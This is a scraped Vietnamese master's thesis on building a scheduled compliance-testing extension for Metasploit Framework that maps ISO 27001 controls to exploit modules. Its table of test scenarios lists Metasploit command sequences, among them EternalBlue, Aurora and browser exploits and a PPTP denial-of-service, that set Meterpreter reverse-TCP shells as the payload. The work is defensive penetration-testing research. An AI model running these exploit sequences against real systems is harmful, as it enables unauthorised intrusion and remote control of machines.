1. Trang chủ
  2. » Luận Văn - Báo Cáo

Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework

67 36 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

3 MỤC LỤC LỜI CẢM ƠN LỜI CAM ĐOAN DANH MỤC HÌNH VẼ, ĐỒ THỊ DANH MỤC BẢNG BIỂU DANH MỤC CÁC KÝ HIỆU VÀ CHỮ VIẾT TẮT MỞ ĐẦU Chương TỔNG QUAN VỀ KIỂM ĐỊNH AN TỒN THƠNG TIN 11 1.1 Bối cảnh 11 1.2 Giới thiệu toán 12 Chương TỔNG QUAN VỀ METASPLOIT 13 2.1 Khái niệm 13 2.2 Các phiên Metasploit 13 2.2.1 Metasploit Community Edition 13 2.2.2 Metasploit Framework Edition 14 2.2.3 Metasploit Pro 15 2.3 Kiến trúc Metasploit 17 2.3.1 Thư viện 17 2.3.2 Giao diện 17 2.3.3 Mô đun chức 19 2.3.4 Thành phần mở rộng 19 Chương HỆ THỐNG CÁC TIÊU CHUẨN VỀ AN TỒN THƠNG TIN 20 3.1 Các tiêu chuẩn quản lý an tồn thơng tin 21 3.2 Họ tiêu chuẩn ISMS 23 3.3 Chuẩn ISO 27001 24 3.4 Chi tiết phụ lục chuẩn ISO 27001 25 Chương XÂY DỰNG CÔNG CỤ LẬP LỊCH QUÉT TỰ ĐỘNG VÀ TUÂN THỦ TIÊU CHUẨN CHO METASPLOIT FRAMEWORK 40 4.1 Tính Automatic Task Chain Metasploit Pro 40 4.2 Phân tích yêu cầu 44 4.3 Lập danh sách mã khai thác 45 4.4 Thiết kế kịch kiểm thử 50 4.5 Cấu trúc Compliance Chain 50 4.5.1 Biểu đồ lớp 51 4.5.2 Danh sách chức 52 4.5.3 Các thao tác nạp kịch kiểm thử 52 KẾT LUẬN 69 TÀI LIỆU THAM KHẢO 71 DANH MỤC HÌNH VẼ, ĐỒ THỊ Hình 2.1 Metasploit Community Edition 14 Hình 2.2 Giao diện Metasploit Framework 14 Hình 2.3 Metasploit Pro 15 Hình 2.4 So sánh phiên Metasploit Pro Framework 16 Hình 2.5 Kiến trúc Metasploit 17 Hình 2.6 Giao diện Console 18 Hình 2.7 Giao diện CLI 18 Hình 2.8 Giao diện Web-GUI 19 Hình 3.1 Hệ thống quy chuẩn an tồn thơng tin 21 Hình 3.2 Họ tiêu chuẩn ISMS 23 Hình 3.3 Danh sách yêu cầu cần kiểm soát 24 Hình 4.1 Danh sách Task Chains 40 Hình 4.2 Danh sách Module Task Chain 41 Hình 4.3 Danh sách thao tác Module 41 Hình 4.4 Danh sách thao tác Module Task Chain 42 Hình 4.5 Lập lịch tự động chạy Chain 43 Hình 4.6 Lập lịch tự động chạy Chain 44 Hình 4.7 Biểu đồ lớp Compliance Chain 51 Hình 4.8 Danh sách chức Compilance Chain 52 Hình 4.9 Hướng dẫn thao tác Compliance Chain 53 Hình 4.10 Nạp kịch vào công cụ Compliance Chains 68 DANH MỤC BẢNG BIỂU Bảng 4.1 Danh sách mã khai thác 49 Bảng 4.2 Danh sách Chains 50 Bảng 4.3 Mô tả kịch 67 DANH MỤC CÁC KÝ HIỆU VÀ CHỮ VIẾT TẮT Ký hiệu Thuật ngữ Ý nghĩa API Application Programming Interface Giao diện lập trình ứng dụng CLI Command Line Interface Giao diện dòng lệnh GUI Graphical User Interface Giao diện đồ họa người dùng HTTPS Hypertext Transfer Protocol Secure Mã hóa giao thức truyền tải siêu văn HTTP HyperText Transfer Protocol Giao thức truyền tải siêu văn IoT Internet of Things Internet vạn vật ISO International Organization for Tổ chức tiêu chuẩn hóa Quốc tế Standardization IEC International Electrotechnical Ủy ban Kỹ thuật điện Quốc tế Commission ISMS Information Security Magagement Hệ thống quản lý an toàn thông tin System MSF Metasploit Framework SSL Secure Sockets Layer Mã hóa lớp Sockets SMB Server Message Block XML eXtensible Markup Language Ngôn ngữ đánh dấu mở rộng MỞ ĐẦU Ngày nay, an ninh thông tin đã, vào ngõ ngách đời sống xã hội dần trở thành phận quan trọng an ninh quốc gia Nguy gây an ninh thông tin mối đe dọa lớn ngày gia tăng an ninh quốc gia Lĩnh vực viễn thơng, Internet, tần số vơ tuyến điện có phát triển mạnh mẽ, đạt mục tiêu số hóa hoàn toàn mạng lưới, phát triển nhiều dịch vụ mới, phạm vi phục vụ mở rộng, bước đầu hình thành doanh nghiệp mạnh, có khả vươn tầm khu vực, quốc tế Hệ thống bưu chuyển phát, báo chí, xuất phát triển nhanh số lượng, chất lượng kỹ thuật nghiệp vụ, có đóng góp quan trọng cho phát triển kinh tế - xã hội; đảm bảo quốc phòng, an ninh, đối ngoại đất nước Tình hình an ninh thơng tin Việt Nam có diễn biến phức tạp Các quan đặc biệt nước ngoài, lực thù địch, phản động tăng cường hoạt động tình báo, gián điệp, khủng bố, phá hoại hệ thống thông tin; tán phát thông tin xấu, độc hại nhằm tác động tới trị nội bộ, can thiệp, hướng lái sách, pháp luật Việt Nam Gia tăng hoạt động công mạng nhằm vào hệ thống thông tin quan trọng an ninh quốc gia Theo thống kê, trung bình năm, qua kiểm tra, kiểm sốt quan chức phát 850.000 tài liệu chiến tranh tâm lý, phản động, ân xá quốc tế, tài liệu tuyên truyền tà đạo trái phép; gần 750.000 tài liệu tuyên truyền chống Đảng, Nhà nước phát tán vào Việt Nam qua đường bưu Từ 2010 đến 2019 có 53.744 lượt cổng thơng tin, trang tin điện tử có tên miền bị cơng, có 2.393 lượt cổng thơng tin, trang tin điện tử quan Đảng, Nhà nước tên miền gov.vn, xuất nhiều công mang màu sắc trị, gây hậu nghiêm trọng Tội phạm vi phạm pháp luật lĩnh vực thông tin diễn biến phức tạp, gia tăng số vụ, thủ đoạn tinh vi, gây thiệt hại nghiêm trọng nhiều mặt Các hành vi phá hoại sở hạ tầng thơng tin, gây an tồn, hoạt động bình thường, vững mạnh mạng máy tính, mạng viễn thông, phương tiện điện tử quan, tổ chức, cá nhân, hệ thống thông tin vô tuyến điện, … gây thiệt hại lớn kinh tế, xâm hại trực tiếp đến quyền, lợi ích hợp pháp quan, tổ chức cá nhân Thực tế nêu làm xuất nhiều nguy đe dọa đến an ninh thông tin Việt Nam bên bên Ở nước, trước hết nguy tụt hậu công nghệ, lệ thuộc vào công nghệ nước ngoài, hệ thống mạng lõi; phần mềm hệ thống, dịch vụ thơng tin nước ngồi (nhất dịch vụ mạng xã hội) dẫn tới chủ quyền nội dung số, tài nguyên thông tin cơng ty cơng nghệ nước ngồi ngày nghiêm trọng hơn; đối tượng hội, chống đối trị nước, triệt để sử dụng mạng xã hội tán phát thông tin giả, thông tin xấu, độc nhằm gây rối nội bộ, kích động biểu tình, bạo loạn 10 Hệ thống thơng tin Việt Nam cịn tồn nhiều điểm yếu, lỗ hổng bảo mật dễ bị khai thác, cơng, xâm nhập, tình trạng lộ, bí mật nhà nước qua hệ thống thơng tin gia tăng đột biến, tượng khai thác, sử dụng trái phép sở liệu, tài nguyên thông tin quốc gia, liệu cá nhân người dùng diễn biến phức tạp, xuất nhiều dịch vụ mới, đại gây khó khăn cho cơng tác quản lý, kiểm sốt quan chức Hiện nay, đất nước ta đứng trước nguy cơ, thách thức lớn từ Cách mạng công nghiệp lần thứ với phát triển, ứng dụng mạnh mẽ trí tuệ nhân tạo, rơ-bốt, cơng nghệ sinh học, hình thành nên nhiều lĩnh vực như: “Internet công nghiệp”, “Nhà máy thông minh”, “Thành phố thông minh”, “Xã hội siêu thơng minh”, “Chính phủ điện tử”, … hoạt động môi trường không gian mạng, tạo đột phá phát triển kinh tế, trị - xã hội Xu hướng Internet kết nối vạn vật (IoT), gồm Internet kết nối với lượng, dịch vụ, truyền thông đa phương tiện, người, vạn vật thay đổi phương thức hoạt động kinh tế, thói quen, tâm lý, văn hóa xã hội Sự phát triển kinh tế xã hội đảm bảo an ninh quốc gia Việt Nam năm tới chủ yếu dựa tảng kỹ thuật số Với xu phát triển kinh tế chia sẻ, chuyển đổi số, … công nghiệp công nghệ thông tin trở thành ngành kinh tế chủ đạo, định phát triển nhanh, bền vững quốc gia Vậy để thông tin bảo vệ, hạn chế công, vừa giúp cho doanh nghiệp, tổ chức có hình ảnh uy tín bên đối tác đánh giá tin tưởng hợp tác với doanh nghiệp có bảo vệ thơng tin cách an tồn vấn đề an tồn thơng tin lại quan trọng, nhu cầu cấp thiết doanh nghiệp, tổ chức Vậy làm để giúp doanh nghiệp, tổ chức thực điều đó? Để trả lời cho câu hỏi này, luận văn “Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework” tơi nghiên cứu tìm hiểu cách xây dựng cơng cụ lập lịch tự động dị qt để kiểm thử an ninh hệ thống (Penetration Testing) sử dụng cơng cụ miễn phí nguồn mở Metasploit Framework theo u cầu tiêu chuẩn an tồn thơng tin ISO 27001 giúp cho doanh nghiệp quản lý, bảo vệ thơng tin cách an tồn hiệu Luận văn chia làm chương: Chương 1: Trình bày tổng quan kiểm định an tồn thơng tin Chương 2: Trình bày tổng quan Metasploit Chương 3: Trình bày hệ thống tiêu chuẩn an tồn thơng tin Chương 4: Xây dựng cơng cụ lập lịch dò quét tự động cho Metasploit Framework 11 Chương TỔNG QUAN VỀ KIỂM ĐỊNH AN TOÀN THÔNG TIN 1.1 Bối cảnh Với phát triển Thế giới nói chung Việt Nam nói riêng, xã hội phát triển kéo thêm nhiều nguy an tồn thơng tin Đặc biệt vấn đề đe dọa thông tin đường truyền Internet, qua máy tính, điện thoại thơng minh, thiết bị thông minh khác để lại nguy tiềm ẩn Tình trạng đáng lo ngại trước hành vi thâm nhập vào hệ thống, phá hoại hệ thống mã hóa, phần mềm xử lý thông tin tự động gây thiệt hại vô lớn Sau số nguy rủi ro an tồn thơng tin: Nguy an tồn thơng tin khía cạnh vật lý: Là nguy điện, nhiệt độ, độ ẩm không đảm bảo, hỏa hoạn, thiên tai, thiết bị phần cứng bị hư hỏng Nguy bị mất, hỏng, sửa đổi nội dung thông tin: Người dùng vơ tình để lộ mật khơng thao tác quy trình tạo hội cho kẻ xấu lợi dụng để lấy cắp làm hỏng thông tin Nguy bị công phần mềm độc hại: Các phần mềm độc hại công nhiều phương pháp khác để xâm nhập vào hệ thống với mục đích khác như: Virus, sâu máy tính (Worm), phần mềm gián điệp (Spyware, Trojan, Adware…) Nguy xâm nhập từ lỗ hổng bảo mật: Lỗi lập trình, lỗi cố phần mềm, nằm nhiều thành phần tạo nên hệ điều hành chương trình cài đặt máy tính Nguy xâm nhập bị công cách phá mật khẩu: Những kẻ công có nhiều cách khác phức tạp để tìm mật truy nhập Những kẻ cơng có trình độ biết ln có khoản mục người dùng quản trị Nguy an tồn thơng tin sử dụng Email: Tấn cơng có chủ đích thư điện tử công Email giả mạo giống email gửi người quen, gắn tập tin đính kèm nhằm làm cho thiết bị bị nhiễm virus Cách thức công thường nhằm vào cá nhân hay tổ chức cụ thể Thư điện tử đính kèm tập tin chứa virus gửi từ kẻ mạo danh đồng nghiệp đối tác Người dùng bị cơng thư điện tử bị đánh cắp mật bị lây nhiễm virus Nguy an tồn thơng tin q trình truyền tin: Trong q trình lưu thơng giao dịch thơng tin mạng Internet nguy an tồn thơng tin q trình truyền tin cao kẻ xấu chặn đường truyền thay đổi phá hỏng nội dung thông tin gửi tiếp tục đến người nhận Mặt khác, ngày Internet/Intranet môi trường tiện lợi cho việc trao đổi thông tin tổ chức cá nhân tổ chức với Các giao dịch trao đổi thư tín điện tử (Email), trao đổi thông tin trực tuyến quan nhà 12 nước cơng dân, tìm kiếm thơng tin, …thơng qua mạng Internet không ngừng mở rộng ngày phát triển Bên cạnh lợi ích mà Internet/Intranet mang lại mơi trường tiềm ẩn nguy gây an toàn an ninh cho hệ thống mạng tổ chức có tham gia giao dịch Internet/Intranet Một vấn đề đặt cho tổ chức bảo vệ nguồn thông tin liệu số liệu cơng tác quản lý hành nhà nước, tài kế tốn, số liệu nguồn nhân lực, tài liệu công nghệ, sản phẩm…., trước mối đe dọa mạng Internet mạng nội làm tổn hại đến an tồn thơng tin gây hậu nghiêm trọng khó lường trước 1.2 Giới thiệu toán Đề tài kết hợp toán, toán nâng cấp Metasploit Framework Hiện tại, Framework khơng có chức nâng cao Metasploit Pro kiểm thử hệ thống theo kịch sẵn có, kiểm thử tự động, lập lịch quét, Hai với nhu cầu thực tế kiểm thử hệ thống đảm bảo tuân thủ chuẩn an tồn thơng tin, Framework chưa đáp ứng mà sử dụng công cụ cung cấp nhiều Exploit rời rạc Do đó, tơi tìm hiểu xây dựng phần mở rộng cho Framework cụ thể hóa u cầu chuẩn an tồn thơng tin mẫu chuẩn ISO 27001 thành Exploit từ sở liệu Exploit Metasploit Framework, xếp thành nhóm để lên kịch kiểm thử, từ lập lịch định kỳ chạy 13 Chương TỔNG QUAN VỀ METASPLOIT 2.1 Khái niệm Metasploit (Metasploit Project) dự án liên quan đến bảo mật máy tính, cung cấp thơng tin lỗ hổng bảo mật Đối tượng Metasploit q trình cơng xâm nhập kiểm thử (Penetration Testing) phát triển hệ thống phát xâm nhập (IDS - Intrusion Detection System) Metasploit Framework có mã nguồn mở, sử dụng Shellcode (Payload) để cơng máy đích có lỗ hổng Cùng với số cơng cụ bảo mật khác, Metasploit có sở liệu chứa hàng ngàn Shellcode, Exploit (khai thác) hệ điều hành, chương trình hay dịch vụ Trong trình phát triển Metasploit liên tục cập nhật Exploit vào sở liệu nên ngày trở thành cơng cụ mạnh mẽ kiểm thử an ninh hệ thống Metasploit Framework tích hợp sẵn hệ điều hành Kali Linux Phiên cài đặt dành cho hệ điều hành Linux/ MacOS/ Windows tải xuống từ địa Website nhà phát triển Rapid https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers Các tính Metasploit: - Quét cổng để xác định dịch vụ hoạt động máy chủ (Server) - Xác định lỗ hổng dựa phiên hệ điều hành phiên phần mềm cài đặt hệ điều hành - Thực nghiệm khai thác lỗ hổng xác định Lịch sử phát triển Metasploit: Metasploit phát triển H D Moore, sinh năm 1981, chuyên gia bảo mật mạng, lập trình viên nguồn mở Hacker Ông người sáng lập Metasploit Project vào năm 2003 công cụ kiểm thử thâm nhập sử dụng ngôn ngữ lập trình Perl Đến năm 2007, Metasploit Framework viết lại hồn tồn ngơn ngữ lập trình Ruby Vào ngày 21 tháng 10 năm 2009, dự án Metasploit mua lại Rapid7, công ty bảo mật chuyên cung cấp giải pháp bảo mật quản lý lỗ hổng 2.2 Các phiên Metasploit 2.2.1 Metasploit Community Edition Phiên phát hành vào tháng 10 năm 2011 bao gồm giao diện người dùng dựa web miễn phí cho Metasploit Metasploit Community Edition dựa chức thương mại phiên trả phí với số tính giảm bớt Network Discovery/Module Browsing/Manual Exploitation Vào ngày 18 tháng năm 2019, Rapid7 thông báo việc kết thúc bán Metasploit Community Edition Người dùng tiếp tục sử dụng giấy phép hết hạn 14 Hình 2.1 Metasploit Community Edition 2.2.2 Metasploit Framework Edition Là phiên mã nguồn mở, hoàn tồn miễn phí, phù hợp cho việc phát triển nghiên cứu, sử dụng giao diện dòng lệnh, có số tính Chính việc phát triển, tích hợp tính vào Metasploit Framework cần thiết, phù hợp với nhu cầu, nhiệm vụ kiểm thử an ninh hệ thống mà có giới hạn mặt chi phí Tuy có nhiều hạn chế tính ưu việt phiên coi cơng cụ thiếu nhà nghiên cứu bảo mật chuyên nghiệp, người kiểm thử xâm nhập giới Hacker ưa chuộng Hình 2.2 Giao diện Metasploit Framework 57 Cập nhật lịch cụ thể hơn, chỉnh 8h30 58 Bước 6: Quản lý Steps: Bước 6.1: Tạo Step: step Tạo liên tiếp Step với tên st1 s2 33333 59 Bước 6.2: Di chuyển Step kiểm tra Step: step prev/next Bước 6.3: Cập nhật vị trí file rc có sẵn: step rc_path 60 Bước 6.4: Sửa file rc: step rc File rc tạo với nội dung động theo Params, Param thừa kế ghi đè theo thứ tự từ Profile Params, Chain Params, Step Params Sinh file thực thi step st1.rc 61 Nội dung step 2.rc Bước 7: Lưu lại thay đổi (thủ cơng) vào file cấu hình config.json File config chuyển sang máy khác để dùng cấu hình chia sẻ Bước 8: Cài đặt/gỡ cc_install/cc_uninstall cài đặt Profile enable vào Crontab: 62 cc_uninstall để gỡ tất Profile Crontab khác Chain bảo toàn Bước 9: Crontab job chạy tương tự sau 63 Sau cài đặt bước chuẩn ISO 27001 vào thành Profile iso271, có Chain trình bày bảng mục 4.4, Chain có Step Exploit mô tả sau: 64 Mô tả kịch bản: Tham Mã chiếu Exploit A.9 MS14-002 Module Msf exploit/windows/local/ms_ndproxy A.9 MS13-059 exploit/windows/browser/ms13_059_cflatmarku ppointer A.9 MS02-063 auxiliary/dos/pptp/ms02_063_pptp_dos A.8 MS13-022 exploit/windows/browser/ms13_022_silverlight_ script_object Mã lệnh kịch use exploit/windows/local/ms_ndproxy set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/browser/ms13_059_cflatmarkuppointer set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use auxiliary/dos/pptp/ms02_063_pptp_dos set RHOSTS set RPORT 1723 run use exploit/windows/browser/ms13_022_silverlight_script_o bject 65 A.8 MS11-081 exploit/windows/browser/ms11_081_option A.8 MS07-029 exploit/windows/smb/ms07_029_msdns_zonena me A.8 MS08-068 exploit/windows/smb/smb_relay set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/browser/ms11_081_option set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/ms07_029_msdns_zonename set RHOSTS set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/smb_relay set RHOSTS 66 A.12 MS17-010 exploit/windows/smb/ms17_010_eternalblue A.12 Google exploit/multi/browser/chrome_object_create Chrome 67, 68 and 69 Object.crea te exploit A.12, A.9 MS15-001 exploit/windows/local/ntapphelpcachecontrol set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS set RPORT 445 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/multi/browser/chrome_object_create set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit use exploit/windows/local/ntapphelpcachecontrol set LHOST set LPORT 4444 67 A.12 MS14-012 A.12 MS10-002 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit exploit/windows/browser/ms14_012_cmarkup_u use exploit/windows/browser/ms14_012_cmarkup_uaf af set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit exploit/windows/browser/ms10_002_aurora use exploit/windows/browser/ms10_002_aurora set SRVHOST set SRVPORT 8080 set LHOST set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp set targets exploit Bảng 4.3 Mô tả kịch 68 Kết sau đưa vào cơng cụ hiển thị sau: Hình 4.10 Nạp kịch vào công cụ Compliance Chains 69 KẾT LUẬN Đánh giá so sánh chức phát triển với thương mại công cụ khác Với Metasploit Pro: Điểm mạnh phiên Metasploit Pro so với Framework mã nguồn mở chức tự động hóa Trong phát triển Metasploit, phiên Pro tăng cường khả vận hành, quản lý thông qua giao diện, phát triển chức trực tiếp mã nguồn Ruby phát triển sẵn thủ tục tự động hóa thao tác Framework (như task chain, smart intelligence, smart exploit, …) Công cụ Compliance Chain thiết kế tái tạo lại gần đủ luồng chức chức Task Chain Pro Do hạn chế quyền phát triển thời lượng đề tài, nhiều chức nâng cao tích hợp Step với cơng cụ bên thứ 3, tích hợp chức khác Pro vào Task Chain chưa thể thực Các chức tạo lập chain, lập lịch, định nghĩa hành động thử nghiệm tương tự phiên Pro Nhờ có đời Compliance Chain Framework với sở cơng cụ tự động hóa thao tác có sẵn Msf, chức nâng cao thao tác với Framework bruteforce, smart exploit, auto scan, … phát triển dễ dàng đem đến cho cộng đồng Msf khả tương tự pro Với công cụ hỗ trợ GUI: Công cụ hỗ trợ Framework Armitage cung cấp giao diện số thao tác sẵn có dựa lệnh Msf chức giống với Compliance Chain thiết kế tự động khai thác dựa dấu vết (Footprint) hệ điều hành máy đối tượng thu thập chức “Hell mode” (chế độ địa ngục) thực thi toàn Exploit biết sở liệu kịch Armitage Với chế độ tự động khai thác, Armitage đưa khai thác dựa dấu vết thu thập Thực mục tiêu kiểm định u cầu chuẩn an tồn thơng tin, ta cần thực nhiều Exploit có liên quan khơng phát thấy dấu hiệu có khả khai thác từ dấu vết Bởi không đảm bảo mục tiêu kiểm thử thông qua Exploit liên thuộc vủa chế độ tự động khai thác mà khơng đảm bảo vượt qua tiêu chí chuẩn Ngược lại chức “Hell mode” lại thực thi toàn Exploit biết, điều nguy hiểm với hệ thống thực tế Thực vậy, thông báo nhắc nhở mối nguy hiểm thực thi chế độ hell mode lên trước lần người dùng định có thực thực thi tồn hay khơng để tránh rủi ro gây sập, phá vỡ hệ thống “Hell mode” vượt nhu cầu kiểm thử, gây tiêu tốn tài nguyên để sót lại nhiều mã độc hệ thống kiểm thử Có thể thấy với phạm vi kiểm thử theo yêu cầu chuẩn, phù hợp với mục tiêu kinh doanh yêu cầu thực tế, công cụ Compliance Chains thực đúng, đủ, tốt đặt gây tổn hại tới hệ thống kiểm định 70 Kết đạt Sau thời gian tìm hiểu, nghiên cứu tài liệu làm luận văn hướng dẫn thầy TS Nguyễn Đại Thọ tơi hồn thành luận văn với đề tài “Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework” Luận văn đạt kết sau: - Tìm hiểu cơng cụ công kiểm thử mã nguồn mở Metasploit, kiến trúc, cách thức hoạt động - Tìm hiểu hệ thống quy chuẩn an tồn thơng tin tiêu chuẩn ISO 27001 - Tìm hiểu, phân tích u cầu hệ thống dựa chuẩn ISO 27001, lập danh sách mã khai thác thực lên lịch quét tự động theo chuẩn ISO 27001 - Xây dựng quy trình phân tích, chuyển đổi yêu cầu an ninh chuẩn thành thực thi cụ thể thông qua công cụ Msf để kiểm định lỗ hổng đặc điểm không tuân thủ chuẩn hệ thống - Xây dựng thành công công cụ triển khai thiết kế kịch lên lịch chạy định kỳ kịch kiểm định Compliance Chains Hạn chế: Công cụ xây dựng tham chiếu đến nhóm Exploit yêu cầu dạng kỹ thuật Các yêu cầu khác liên quan tới quản trị quản lý người cơng cụ chưa đáp ứng số hố hồn tồn Cụ thể với chuẩn ISO 27001, cơng cụ đáp ứng mục yêu cầu A.8, A.9 A.12 chuẩn ISO 27001 mà không tham chiếu hết 14 yêu cầu chuẩn Định hướng phát triển: Từ kết nghiên cứu thu được, đề tài mở rộng phát triển theo hướng sau: - Phát triển thêm theo yêu cầu nhiều chuẩn an tồn thơng tin thuộc lĩnh vực chun ngành khác, mở rộng thêm danh sách Exploit đáp ứng đầy đủ yêu cầu chuẩn - Nghiên cứu phát triển hệ thống phân tích kết dị qt hệ thống, gợi ý vá lỗ hổng theo kết thu thập 71 TÀI LIỆU THAM KHẢO Tiếng Anh Mike Chapple., David Seildl (2019), Pentest+ Study Guide, CompTIA David Maynor., K K Mookhey., Jacopo Cervini., Fairuzan Roslan., Kevin Beaver (2007), Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research Website Metasploit Project Retrieved from https://en.wikipedia.org/wiki/Metasploit_Project Introduction to metasploit framework Retrieved from https://www.slideshare.net/MostafaAbdelsallam/01-metasploit-kung-fuintroduction Metasploit Community Edition Retrieved from https://www.offensivesecurity.com/metasploit-unleashed/msf-community-edition/ Metasploit Pen Testing Tool Retrieved from https://www.rapid7.com/products/metasploit/download/editions/ What is Metasploit? The Beginner’s Guide Retrieved from https://www.varonis.com/blog/what-is-metasploit/ Vulnerability & Exploit Database Retrieved from https://www.rapid7.com/db/?q=&type=metasploit The Requirements & Annex A Controls of ISO 27001 Retrieved from https://www.isms.online/iso-27001/requirements-controls/ ISO 27001: The 14 control sets of Annex A explained Retrieved from https://www.itgovernance.co.uk/blog/iso-27001-the-14-control-sets-of-annex-aexplained ISO 27001 Compliance Checklist Retrieved from https://idoc.pub/download/iso-27001-compliance-checklist-d2nv3oomx04k 10 Mapping to ISO 27001 Controls Retrieved from http://www.esdebe.com/perch/resources/iso-27001-annex-s-controlmapping.pdf 11 An ninh thông tin Việt Nam điều kiện Retrieved from http://tuyengiao.vn/ 12 Quá trình hình thành tiêu chuẩn an tồn thơng tin Retrieved from http://antoanthongtin.gov.vn/ 13 Mơ tả chức Task Chain Retrieved from https://docs.rapid7.com/metasploit/task-chains/ 14 Rubydoc of Metasploit Framework project Retrieved from https://www.rubydoc.info/github/rapid7/metasploit-framework ... ? ?Nâng cấp ứng dụng khai thác lỗ hổng an ninh Metasploit Framework? ?? nghiên cứu tìm hiểu cách xây dựng cơng cụ lập lịch tự động dò quét để kiểm thử an ninh hệ thống (Penetration Testing) sử dụng cơng... tin cách an tồn vấn đề an tồn thông tin lại quan trọng, nhu cầu cấp thiết doanh nghiệp, tổ chức Vậy làm để giúp doanh nghiệp, tổ chức thực điều đó? Để trả lời cho câu hỏi này, luận văn ? ?Nâng cấp. .. Module khai thác lỗi hỏng nhớ Internet Bình Explorer Mã khai thác cổng trực tiếp thường mẫu công khai xuất đến trang web phân tích phần mềm độc hại Wepawet A.12 Bảng 4.1 Danh sách mã khai thác

Ngày đăng: 09/08/2021, 11:49

Xem thêm:

HÌNH ẢNH LIÊN QUAN

Hình 2.2. Giao diện Metasploit Framework - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.2. Giao diện Metasploit Framework (Trang 10)
Hình 2.1. Metasploit Community Edition - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.1. Metasploit Community Edition (Trang 10)
Hình 2.3. Metasploit Pro - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.3. Metasploit Pro (Trang 11)
Hình 2.4. So sánh phiên bản Metasploit Pro và Framework - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.4. So sánh phiên bản Metasploit Pro và Framework (Trang 12)
Hình 2.5. Kiến trúc Metasploit - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.5. Kiến trúc Metasploit (Trang 13)
Hình 2.6. Giao diện Console - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.6. Giao diện Console (Trang 14)
Hình 2.7. Giao diện CLI - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.7. Giao diện CLI (Trang 14)
Hình 2.8. Giao diện Web-GUI - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 2.8. Giao diện Web-GUI (Trang 15)
Hình 3.1. Hệ thống các quy chuẩn về an toàn thông tin - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 3.1. Hệ thống các quy chuẩn về an toàn thông tin (Trang 17)
Hình 3.2. Họ tiêu chuẩn ISMS - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 3.2. Họ tiêu chuẩn ISMS (Trang 19)
Hình 3.3. Danh sách các yêu cầu cần kiểm soát - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 3.3. Danh sách các yêu cầu cần kiểm soát (Trang 20)
A.12.3.1 Sao lưu thông tin Các bản sao lưu thông tin, phần mềm, hình ảnh  hệ  thống  sẽ  được  chụp  và  kiểm  tra  thường  xuyên  theo  chính  sách  sao  lưu  đã  thỏa thuận. - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
12.3.1 Sao lưu thông tin Các bản sao lưu thông tin, phần mềm, hình ảnh hệ thống sẽ được chụp và kiểm tra thường xuyên theo chính sách sao lưu đã thỏa thuận (Trang 28)
hóa và lập lịch chạy định kỳ theo 1 cấu hình định trước. - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
h óa và lập lịch chạy định kỳ theo 1 cấu hình định trước (Trang 36)
Hình 4.2. Danh sách Module trong Task Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.2. Danh sách Module trong Task Chain (Trang 37)
Cài đặt cho từng tác vụ quét máy chủ, thiết lập cấu hình khai thác lỗ hổng điều kiện cần thiết để thực hiện chuỗi các nhiệm vụ, tạo báo cáo và lập lịch chạy tự động - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
i đặt cho từng tác vụ quét máy chủ, thiết lập cấu hình khai thác lỗ hổng điều kiện cần thiết để thực hiện chuỗi các nhiệm vụ, tạo báo cáo và lập lịch chạy tự động (Trang 37)
Hình 4.4. Danh sách các thao tác Module trong Task Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.4. Danh sách các thao tác Module trong Task Chain (Trang 38)
Hình 4.5. Lập lịch tự động chạy Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.5. Lập lịch tự động chạy Chain (Trang 39)
